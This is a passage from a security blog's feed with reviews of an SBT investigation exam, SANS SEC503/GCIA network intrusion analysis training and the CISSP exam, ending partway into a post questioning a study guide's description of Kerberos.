&lt;/h2&gt;&lt;p&gt;Where I loved the training material, I was a little disappointed by the exam. The format of the exam is a hands on wee investigation, which I love. You get 24 hours in total to go through the exam process. For the first 12 hours, you&amp;rsquo;re in a small network investigating a compromise. While this investigation is fairly well led through the provided exam report template, it seems a touch arbitrary. There was no provided &amp;ldquo;this is why we think the network is compromised&amp;rdquo; as a part of the narrative scenario, and it broke my immersion a bit.&lt;/p&gt;
&lt;p&gt;The exam environment itself is accessed via a remote access session through your browser. That means if you want to interactively access a machine you want to investigate, you&amp;rsquo;re RDP&amp;rsquo;ing through your browser to an investigation machine, then RDP&amp;rsquo;ing or SSH&amp;rsquo;ing or what have you through to a second machine. If you have internet (or bad luck on the lab environment&amp;rsquo;s internal connection) like me, you&amp;rsquo;re in for a bit of a rough time.&lt;/p&gt;
&lt;p&gt;The lab has limited internet access, which makes sense. Threw a small spanner in the works for me, as I was planning on importing tools that I was more familiar with to perform analysis. Egg on my face there, the lack of internet access makes sense really. The downside here was that some of the tools I was taught about (and found to be &lt;em&gt;awesome&lt;/em&gt; in the course) required internet access to become usable, so I couldn&amp;rsquo;t use those either, which was frustrating.&lt;/p&gt;
&lt;p&gt;The approved tools weren&amp;rsquo;t clearly enumerated, which cost me time. I spent most of my exam using tools with desktop shortcuts, only to discover near the end that additional tools were accessible via the start menu. Pro tip: if you&amp;rsquo;ve been taught a tool and think it&amp;rsquo;ll be useful, hit the Windows key and search for it when you start the exam.&lt;/p&gt;
&lt;p&gt;On the positive side, the intrusion uses modern tools and techniques you&amp;rsquo;ll actually see in the real world - no old CVEs or Windows XP boxes. The scenarios are what I&amp;rsquo;d expect an MSP SOC analyst to encounter regularly.&lt;/p&gt;
&lt;p&gt;The feedback I got from this exam is the best I&amp;rsquo;ve had from any assessment. A couple days after submitting, I got an email advising I&amp;rsquo;d passed with 90%. The feedback included what I&amp;rsquo;d done well and what I&amp;rsquo;d missed or could improve. This shows SBT is keen on helping you improve even after the training engagement is done. (And no, I don&amp;rsquo;t share that feedback, it&amp;rsquo;s far too exam specific).&lt;/p&gt;
</description>
        </item>
        <item>
        <title>SEC503 - GIAC Certified Intrusion Analyst</title>
        <link>https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/</link>
        <pubDate>Wed, 03 Mar 2021 00:00:00 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/</guid>
        <description>&lt;p&gt;Date Earned: February 13, 2021&lt;br&gt;
Proof: &lt;a class=&#34;link&#34; href=&#34;https://www.credly.com/badges/56086fc8-f848-4b13-b7e4-b6f2947e1028/public_url&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;https://www.credly.com/badges/56086fc8-f848-4b13-b7e4-b6f2947e1028/public_url&lt;/a&gt;&lt;br&gt;
Linky: &lt;a class=&#34;link&#34; href=&#34;https://www.sans.org/cyber-security-courses/intrusion-detection-in-depth/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;https://www.sans.org/cyber-security-courses/intrusion-detection-in-depth/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/1.png&#34;
	width=&#34;795&#34;
	height=&#34;316&#34;
	srcset=&#34;https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/1_hu_b275fb2826b94952.png 480w, https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/1_hu_7b1bab986db48541.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;This is frustration&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;251&#34;
		data-flex-basis=&#34;603px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;&lt;em&gt;This&lt;/em&gt; is frustration!&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I &lt;em&gt;loved&lt;/em&gt; this training and certification journey. This was my first SANS experience, and David Hoelzer was a proper rock star, but more on that below. Despite attempting the certification almost three years after sitting the training, I&amp;rsquo;m happy enough with the result (although part of me thinks I&amp;rsquo;d almost have rather gotten a 95%).&lt;/p&gt;
&lt;h2 id=&#34;whos-it-for&#34;&gt;Who&amp;rsquo;s it for?
&lt;/h2&gt;&lt;p&gt;GCIA is for people who get down and dirty in networking. It suits SOC analysts who monitor, review and triage network intrusion detection / prevention systems, or who write detection logic for these systems. It suits incident response personnel who receive insanely large packet captures from clients and need to quickly triage, or investigate these collections for evidence of threat actor activity.It suits threat hunting staff flailing against the massive amounts of ingress / egress network traffic, searching for anomalies.It also suits security architects who want to be able to design and implement high quality intrusion detection and prevention systems across an organisation&amp;rsquo;s network.&lt;/p&gt;
&lt;p&gt;A student who is familiar with general networking concepts (routing protocols, subnetting, NAT / PAT and a passing knowledge of the OSI model) will excel in this class. Skills with the linux command line will also be beneficial.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re looking to get a head start on this training, or keep your skills sharp after taking the class, &lt;a class=&#34;link&#34; href=&#34;https://www.malware-traffic-analysis.net&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Malware Traffic Analysis&lt;/a&gt; has an impressive collection of scenarios, including pcap and alert data. It also has solutions to the problems, so you can continue learning even if you get proper stuck. All screenshots below have been taken from my processing of one of these scenario packages: &lt;a class=&#34;link&#34; href=&#34;https://www.malware-traffic-analysis.net/2016/02/06/index.html&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Cupid&amp;rsquo;s Arrow Online&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&#34;training&#34;&gt;Training
&lt;/h2&gt;&lt;p&gt;I took the OnDemand training in 2018. This provided me with mp3&amp;rsquo;s recorded from a class, downloadable VM&amp;rsquo;s with a collection of lab files. A few days after my start date, a box arrived with my physical course books and some swag (a SANS branded thermal cup that has a weird suction cup thing on the bottom, making it difficult to knock over. Had some real fun in the office slapping it around for an afternoon). Finally, I received 4 months access to pre-recorded lecture videos going over all of the content, and 4 months access to a VPN environment containing a CTF style server that seems to mimic the Day 6 challenge environment.&lt;/p&gt;
&lt;p&gt;We start with the very core of how networking works, learning how packets are constructed at the byte level. We break down both the TCP/IP and OSI models, and how they work practically to make up frames, packets, and segments (but let&amp;rsquo;s be honest, in the real world they&amp;rsquo;re all packets ;) ). Furthermore, we dive deep into how different protocols work in isolation, and how they work together to make the internet work. If they weren&amp;rsquo;t already, jokes like this will suddenly be hilarious:&lt;em&gt;I&amp;rsquo;d tell you a joke about UDP, but you might not get it.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/2.png&#34;
	width=&#34;1000&#34;
	height=&#34;656&#34;
	srcset=&#34;https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/2_hu_40ab9239e4a8bda0.png 480w, https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/2_hu_3c7e8518983e0079.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Say hello to your new best friend&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;152&#34;
		data-flex-basis=&#34;365px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;Say hello to your new best friend&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;On this part of the course, I would have loved to see a little more information on NAT / PAT and subnetting, but that could very well be a personal preference.&lt;/p&gt;
&lt;p&gt;Once we&amp;rsquo;re familiar with how networking works generally, we start to learn how we can capture and filter network traffic. This has us using &lt;a class=&#34;link&#34; href=&#34;https://www.wireshark.org/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Wireshark&lt;/a&gt; and &lt;a class=&#34;link&#34; href=&#34;https://www.tcpdump.org/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;tcpdump&lt;/a&gt; with Berkely Packet Filters (bpf) to filter live network traffic, or previously captured traffic, with surgical precision. This is where the knowledge we acquired yesterday shows its value - with a single filter, you can very quickly find only UDP packets, or packets sent to port 80, or only packets with the TCP RST and ACK flags set.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/3.png&#34;
	width=&#34;1848&#34;
	height=&#34;476&#34;
	srcset=&#34;https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/3_hu_ed0cfa913e71a527.png 480w, https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/3_hu_630d61e9fe700c48.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Let’s see only the TCP SYN packets headed to port 80&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;388&#34;
		data-flex-basis=&#34;931px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;Let&amp;rsquo;s see only the TCP SYN packets headed to port 80&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;We also learn how to follow specific network conversations, and how to pull transmitted files (like files transmitted over HTTP). If we were concerned about any of these, we can save them to disk and perform deeper analysis.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/4.png&#34;
	width=&#34;1574&#34;
	height=&#34;448&#34;
	srcset=&#34;https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/4_hu_2445a644fa3bf355.png 480w, https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/4_hu_1bc1d50beeee3007.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Standard web traffic… or is it?&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;351&#34;
		data-flex-basis=&#34;843px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;Standard web traffic&amp;hellip; or is it?&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Now that we know how to deeply analyse specific networking conversations, we need to learn how to find those needles of interesting traffic in the haystack of business traffic. Here we learn what netflow is, and how we can use a suite of tools (known collectively as &lt;a class=&#34;link&#34; href=&#34;https://tools.netsa.cert.org/silk/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;SiLK&lt;/a&gt;) to generate and review netflow data from either raw traffic or pcaps. SiLK provides a powerful capability in the identification and enumeration of trends, which is where netflow shines. This is largely where incident responders and threat hunters will derive a good deal of value.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/5.png&#34;
	width=&#34;1312&#34;
	height=&#34;364&#34;
	srcset=&#34;https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/5_hu_48d79bb82d3c6f3f.png 480w, https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/5_hu_6775b3ab1decbe3f.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Filtering for TCP (proto 6), and showing the top 5 results by source port. We’re probably monitoring some web servers here, but those high-ports are interesting.&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;360&#34;
		data-flex-basis=&#34;865px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;Filtering for TCP (proto 6), and showing the top 5 results by source port. We&amp;rsquo;re probably monitoring some web servers here, but those high-ports are interesting.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;We also learn about &lt;a class=&#34;link&#34; href=&#34;https://www.snort.org/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Snort&lt;/a&gt; and Bro (now &lt;a class=&#34;link&#34; href=&#34;https://zeek.org/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Zeek&lt;/a&gt;), network traffic inspection systems that are going to be our detection or prevention bread and butter.&lt;/p&gt;
&lt;p&gt;Snort takes signature files that take a single or combination of characteristics for a given network connection, and can alert on that traffic if the signature matches. This doesn&amp;rsquo;t just need to be networking characteristics (destination port, source IP address, protocol, etc), but can do complex matching against the packets themselves, known as Deep Packet Inspection. For example, destination port of 80 (HTTP, typically) but the application layer data doesn&amp;rsquo;t match HTTP, it&amp;rsquo;s all binary, or there&amp;rsquo;s no HEAD tag. We learn how to both read the alerts Snort generates, and write our own rules for newly identified malicious traffic.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/6.png&#34;
	width=&#34;1722&#34;
	height=&#34;292&#34;
	srcset=&#34;https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/6_hu_92b74d7c335e284a.png 480w, https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/6_hu_eedb8b3bf4b24871.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Snort is alerting us to an oddity. Note the xref links. While not mandatory, if you write rules without them, I’ll cry.&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;589&#34;
		data-flex-basis=&#34;1415px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;Snort is alerting us to an oddity. Note the xref links. While not mandatory, if you write rules without them, I&amp;rsquo;ll cry.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;With netflow, we don&amp;rsquo;t have enough information to perform a complete investigation. With Snort and full pcap, we have all the data in the world, but the infrastructure to support full pcap and the time to analyse it can be prohibitive. If only there was some form of middle ground&amp;hellip;&lt;/p&gt;
&lt;p&gt;Enter Zeek (formerly Bro). Zeek works to pull out the interesting parts of network traffic (files transmitted, certificate thumbprints, connection metadata, SNMP config&amp;rsquo;s pushed, etc) without the overhead of storing every packet transiting the network. Additionally, we can write our own rules to pull out specific metadata, if it matters for our particular environment. For example, maybe we write rules to log all commands sent from a central server out to ATMs, so that these can be audited and reviewed should anything go awry.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/7.png&#34;
	width=&#34;1998&#34;
	height=&#34;292&#34;
	srcset=&#34;https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/7_hu_1750781b0c3133fb.png 480w, https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/7_hu_7afe99e9aac14d.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Stacking based on certificate issuer to find resources with a low frequency of occurrence.&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;684&#34;
		data-flex-basis=&#34;1642px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;Stacking based on certificate issuer to find resources with a low frequency of occurrence.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;With our newly minted detection logic in place, we need to test it before throwing it straight into production (because that&amp;rsquo;s what we do as professionals, right? We test, &lt;em&gt;then&lt;/em&gt; push into production. We &lt;em&gt;never&lt;/em&gt; test in production&amp;hellip;). To that end, we get down and dirty with &lt;a class=&#34;link&#34; href=&#34;https://scapy.net/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Scapy&lt;/a&gt;, a python project we can use to easily generate our own packets / network traffic. Most importantly (I think), Scapy takes the guard rails off and lets us programmatically generate invalid packets (as different OS&amp;rsquo;s handle these packets differently, we need to be able to test them). Invalid checksums, miscalculated TCP sequence numbers or IP length values, all are easily generated and transmitted with Scapy.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/8.png&#34;
	width=&#34;1616&#34;
	height=&#34;394&#34;
	srcset=&#34;https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/8_hu_85d2a5078bd9e29b.png 480w, https://thisinsecureworld.com/p/sec503-giac-certified-intrusion-analyst/8_hu_a7ce9ba4463c9196.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Custom packet built and sent in Scapy to test our detections&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;410&#34;
		data-flex-basis=&#34;984px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;Custom packet built and sent in Scapy to test our detections&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;All of this is tested on Day 6, with a massive CTF style challenge. The challenge questions guide you through three massive 10 gigabyte+ packet capture files, each captured from a different segment of a fictitious network. It walks us through identifying some anomalous traffic, then has us track down this activity through the network and enumerating exactly what the threat actor did in this attack. Being OnDemand, I was ineligible for a sweet sweet challenge coin, which was unfortunate.&lt;/p&gt;
&lt;p&gt;All of this content was expertly delivered by &lt;a class=&#34;link&#34; href=&#34;https://www.sans.org/profiles/david-hoelzer/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;David Hoelzer&lt;/a&gt;, author and instructor for this course. Coming into it, I was dubious as to how SANS could justify their training price tag. David did a fantastic job of showing how SANS stays in business :D. He has mastered the art of answering questions students may have before they get asked - this is difficult at the best of times, but when you add in a non-interactive medium like OnDemand (pre-recorded videos), it really lets his expertise shine through. This expertise and theory is backed by a truly impressive number of hands on labs that cement the knowledge we&amp;rsquo;re being bombarded with.&lt;/p&gt;
&lt;h2 id=&#34;certification&#34;&gt;Certification
&lt;/h2&gt;&lt;p&gt;I didn&amp;rsquo;t get a certification attempt as a part of my initial training. I only revisited the idea of getting this certification a couple of years later when I was in a better financial position. Cheeky hint here, if you ever find yourself in the same position, you can &lt;a class=&#34;link&#34; href=&#34;https://www.sans.org/mlp/affiliate-pricing-giac/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;reach out to SANS&lt;/a&gt;, and they may flick you a tasty wee discount. It worked for me, which I was grateful for.&lt;/p&gt;
&lt;p&gt;The exam attempt comes with two practice tests, which are super closely aligned to the actual exam in content and format. My test was made up of 106 questions, 10 of which were VM-based hands on practical  questions, to be answered in a four-hour testing marathon.&lt;/p&gt;
&lt;p&gt;The idea of hands on practical questions scared the crap out of me. Thankfully, I got to trial these in the practice tests, and realised they weren&amp;rsquo;t the monsters I&amp;rsquo;d built them up to be in my head. They aren&amp;rsquo;t massive compounded questions, as long as you can do all the material in the labs (and it&amp;rsquo;s open book, so you can look up your notes), you won&amp;rsquo;t have any issues. After going through the whole process, I think I&amp;rsquo;d rather a test made up of 20-30 practical questions over the inclusion of multi-choice questions.&lt;/p&gt;
&lt;p&gt;I do strongly recommend the creation of your own index to take in to the exam, but more as a learning technique than as a pass-the-exam technique. This is mostly because I think the value of a certification is the process of acquiring the understanding required to pass, instead of rote memorisation.&lt;/p&gt;
&lt;p&gt;Hopefully this has given you a better understanding of the SEC503 material and associated exam, and you can now make an informed decision about signing up, or be more confident going in to the exam. Either way, good luck! If you have any questions, you can reach me via the social buttons on the left.&lt;/p&gt;
</description>
        </item>
        <item>
        <title>ISC² CISSP</title>
        <link>https://thisinsecureworld.com/p/isc2-cissp/</link>
        <pubDate>Mon, 01 Jun 2020 05:44:00 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/p/isc2-cissp/</guid>
        <description>&lt;p&gt;Date Earned: May 12, 2020&lt;/p&gt;
&lt;p&gt;Before reading the below, the best piece of advice I can offer when reading any of these write-ups is bear in mind they are what worked for the author. Take from the below the parts that will help YOU prepare, and ignore the rest. If it isn&amp;rsquo;t helpful, it&amp;rsquo;s hurtful.&lt;/p&gt;
&lt;p&gt;I really wanted to come out of this exam with some insight I’d not seen elsewhere, that magical silver bullet. That didn’t happen. All the advice I thought of after the exam was stuff I’d heard elsewhere. So what I’m offering here is a list of what I found most valuable based on my exposure to .1% of the possible exam questions.&lt;/p&gt;
&lt;h2 id=&#34;context-my-experience-before-studying-starts&#34;&gt;Context (my experience before studying starts)
&lt;/h2&gt;&lt;p&gt;I’ve been in IT for around 10 years, with about 5 of that in dedicated infosec roles (incident analyst, responder, forensic investigator, appliance admin) across government and private sectors. Most recently, I spent two years doing incident response consulting and training others to do the same. I had certs covering Windows (MCSA), CompTIA Sec+, and various forensics and networking credentials.&lt;/p&gt;
&lt;h2 id=&#34;prep-what-i-used-and-what-i-thought&#34;&gt;Prep (What I used and what I thought)
&lt;/h2&gt;&lt;p&gt;&lt;em&gt;Note, that this is MY experience, pick out what suits you, leave the rest.&lt;/em&gt;&lt;/p&gt;
&lt;h3 id=&#34;discord&#34;&gt;Discord
&lt;/h3&gt;&lt;p&gt;First, for real, this discord, right here &lt;a class=&#34;link&#34; href=&#34;https://discord.com/invite/certstation&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;https://discord.com/invite/certstation&lt;/a&gt;. I wouldn’t have passed without it. I joined this discord… roughly 4-8 weeks before I sat the exam, did nothing for a week, then got really involved.  I believe in order to get the most out of this server, you need to contribute. A couple of notes on this server, though:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Be wrong. Defend your answer if you’re solid on it, but be open-minded. If someone makes a good point, consider it. Research it.&lt;/li&gt;
&lt;li&gt;There’s nothing wrong with being wrong. There’s a bit of culture about racing to have the right answer, and that’s sweet, nothing wrong with a bit of healthy competition (I’m guilty of it myself). Just remember proving to everyone else in the server how smart you are isn’t going to help you on the exam. Make sure you’re still learning.&lt;/li&gt;
&lt;li&gt;This is an excellent server, but think critically about the information you’re being provided. Not everybody will be willing to change their stance on what they believe, and that can sway you into incorrect thinking. See the first point. Do your research, reach a conclusion based on evidence, and let that be the knowledge you take into your exam.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&#34;udemy-thor-pedersen-here-get-sick-discounts-httpsthorteachescomudemy&#34;&gt;Udemy (Thor Pedersen) (Here, get sick discounts: &lt;a class=&#34;link&#34; href=&#34;https://thorteaches.com/udemy/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;https://thorteaches.com/udemy/&lt;/a&gt;)
&lt;/h3&gt;&lt;p&gt;This course was my bread and butter. I listened to this twice, once while painting, and then a second time at 1.25x speed. Udemy was a bit screwy, so I couldn’t really read the slides, but Thor’s explanations and examples certainly made up for it. No rose-tinted glasses, Thor can be a bit tough to understand at times, but this content worked for me. Thor also makes the slides available for download, mitigating the Udemy issue.&lt;/p&gt;
&lt;h3 id=&#34;boson-practice-tests&#34;&gt;Boson Practice Tests
&lt;/h3&gt;&lt;p&gt;These are technical, much more technical than the exam. You’ve heard it before, you’ll hear it again. However, I don’t think this is a bad thing. The explanations are excellent, and I think the understanding you gain in order to be able to pass the Boson tests enables success on the actual exam. In my opinion, Boson is not an exam simulator of any kind of representative standard of the actual exam. What it is, is another learning tool in your toolbox.&lt;/p&gt;
&lt;h3 id=&#34;cissp-pocketprep&#34;&gt;CISSP PocketPrep
&lt;/h3&gt;&lt;p&gt;This was excellent for reinforcement, and replaced Reddit on my phone for the last few weeks. Mostly used in small rooms with no other distractions ;)&lt;/p&gt;
&lt;h3 id=&#34;sybex-official-study-guide&#34;&gt;Sybex Official Study Guide
&lt;/h3&gt;&lt;p&gt;For me, this was the official reference guide :P. This was too hard for me to read, no matter how many times I tried, so I used it when I came up against a concept that I couldn’t fully grasp via other means. The online flash cards and associated practice test was excellent for concept cementing and definition remembering, though.&lt;/p&gt;
&lt;h3 id=&#34;pluralsight-kevin-henry-cissp-course&#34;&gt;Pluralsight (Kevin Henry) CISSP Course
&lt;/h3&gt;&lt;p&gt;This did nothing for me. I couldn’t get into the delivery, and it felt like some material was designed for other exams and was being shoehorned into CISSP prep.&lt;/p&gt;
&lt;h3 id=&#34;linkedin-learning-mike-chapple&#34;&gt;LinkedIn Learning (Mike Chapple)
&lt;/h3&gt;&lt;p&gt;I enjoyed this course. I listened to it when I was painting the house, so I didn’t get a really visual experience, but that doesn’t seem like much of a loss; the few slides I did look at was a few words on the screen Mike was talking about. The course content was really helpful to me.&lt;/p&gt;
&lt;h2 id=&#34;the-exam&#34;&gt;The exam
&lt;/h2&gt;&lt;p&gt;A lot of people talk about taking the day before the exam off, and relaxing, and not studying. I didn’t do this. I passed the exam. You know your fatigue level and readiness best, do what works for you.&lt;/p&gt;
&lt;p&gt;I listened to Kelly’s “&lt;a class=&#34;link&#34; href=&#34;https://www.youtube.com/watch?v=v2Y6Zog8h2A&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Why you will pass the CISSP&lt;/a&gt;”, and it was excellent advice. I think this is over-hyped, though. It applied in various strengths to about 40% of my exam questions, where my impression from other reviews was &amp;ldquo;this video is applicable to every question&amp;rdquo;. It wasn&amp;rsquo;t in my exam.&lt;/p&gt;
&lt;p&gt;I did the usual things, got in, sat down, immediately started scribbling down the RMF and SDLC steps. I never referred to these again, but knowing they were there gave me peace of mind. Again, do what works for you.&lt;/p&gt;
&lt;p&gt;The exam was actually more technical than I expected. I had a subnetting question, and it was, in my opinion, about 2 inches deep :P. I only had multi choice questions, no drag and drop or hotspots.&lt;/p&gt;
&lt;p&gt;The questions weren’t worded with gotchas, they were very straightforward. There were a couple where I read too fast, and initially missed that they were asking for a solution instead of a policy, or a next step, or what have you (read questions slowly or twice. There&amp;rsquo;s advice I&amp;rsquo;ll bet you&amp;rsquo;ve never heard before).&lt;/p&gt;
&lt;p&gt;No double negatives, and very few NOTs at all.&lt;/p&gt;
&lt;p&gt;The questions can typically be distilled down to the one you’re used to seeing. While most of them are scenario based, what probably 20% of mine were asking was “what is the name of the SDLC / RMF / RA / SA / BCP / DR step they are on OR will move on to next”&lt;/p&gt;
&lt;p&gt;A fair number of them were “Here’s a scenario, what’s the best technology to implement  to fix the problem”. &lt;strong&gt;Note here it wasn’t asking for a policy, but for a technical solution.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I can’t remember where I read the advice, so can’t credit the author, and I’m sorry about that, but it went “Give the question what it’s asking for. If it wants a policy, give it a policy. If it wants a solution, give it a solution”. That certainly applied to my exam.&lt;/p&gt;
&lt;p&gt;Finally, while I mentioned that all the questions made sense, sometimes the answers just didn’t align with what was being asked for. Like, there was no best, they all seemed equally wrong. In that case, I just picked an answer that ‘felt’ right, hit next, and didn’t let it stay in my mind. It was the only way to preserve my sanity.&lt;/p&gt;
&lt;p&gt;I think the biggest thing for this exam is understanding the material. 95% of my questions were scenario based, and if you understand the underlying technology and methodology, you can apply it to anything they ask with a sufficient degree of certainty. Discussion in discord, and the Boson questions, helped me most with this.&lt;/p&gt;
&lt;p&gt;Good luck. You&amp;rsquo;ve got this.&lt;/p&gt;
</description>
        </item>
        <item>
        <title>Kerberos Errata Submission - Research Process</title>
        <link>https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/</link>
        <pubDate>Tue, 17 Mar 2020 09:04:45 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/</guid>
        <description>&lt;p&gt;Quick note here, this blog does not dive into the details of how kerberos operates. If that&amp;rsquo;s what you&amp;rsquo;re looking for, see &lt;a class=&#34;link&#34; href=&#34;https://syfuhs.net/a-bit-about-kerberos&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;this excellent post&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&#34;background&#34;&gt;Background
&lt;/h2&gt;&lt;p&gt;When I was studying for the CISSP, I was chatting away in the &lt;a class=&#34;link&#34; href=&#34;https://thisinsecureworld.com/p/isc2-cissp&#34; &gt;Discord server recommended here&lt;/a&gt;, when I saw the gem &amp;ldquo;Kerberos encrypts the username to authenticate&amp;rdquo; fly past. Having played with Kerberos a little myself, I knew this was incorrect, and lively debate followed. The original messager pointed to the Sybex CISSP Official Study Guide as their source. Intruiged, I cracked open my own copy, and saw the Kerberos steps listed below.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;(as an aside, I withdrew from the debate at this time. While I know technically how Kerberos works, if that&amp;rsquo;s how ISC2 reports Kerberos works, that&amp;rsquo;s probably how they test it too. I&amp;rsquo;d hate for someone to fail an exam because they learnt how the real world works instead of what ISC2 want you to know).&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;For reference, below are the steps listed in the study guide as how Kerberos performs authentication:&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;div class=&#34;chroma&#34;&gt;
&lt;table class=&#34;lntable&#34;&gt;&lt;tr&gt;&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code&gt;&lt;span class=&#34;lnt&#34;&gt;1
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;2
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;3
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;4
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;5
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;6
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-fallback&#34; data-lang=&#34;fallback&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;1. The user types a username and password into the client.
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;2. The client encrypts the username with AES for transmission to the KDC.
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;3. The KDC verifies the username against a database of known credentials.
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;4. The KDC generates a symmetric key that will be used by the client and the Kerberos server. It encrypts this with a hash of the user’s password. The KDC also generates an encrypted time-stamped TGT.
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;5. The KDC then transmits the encrypted symmetric key and the encrypted time-stamped TGT to the client.
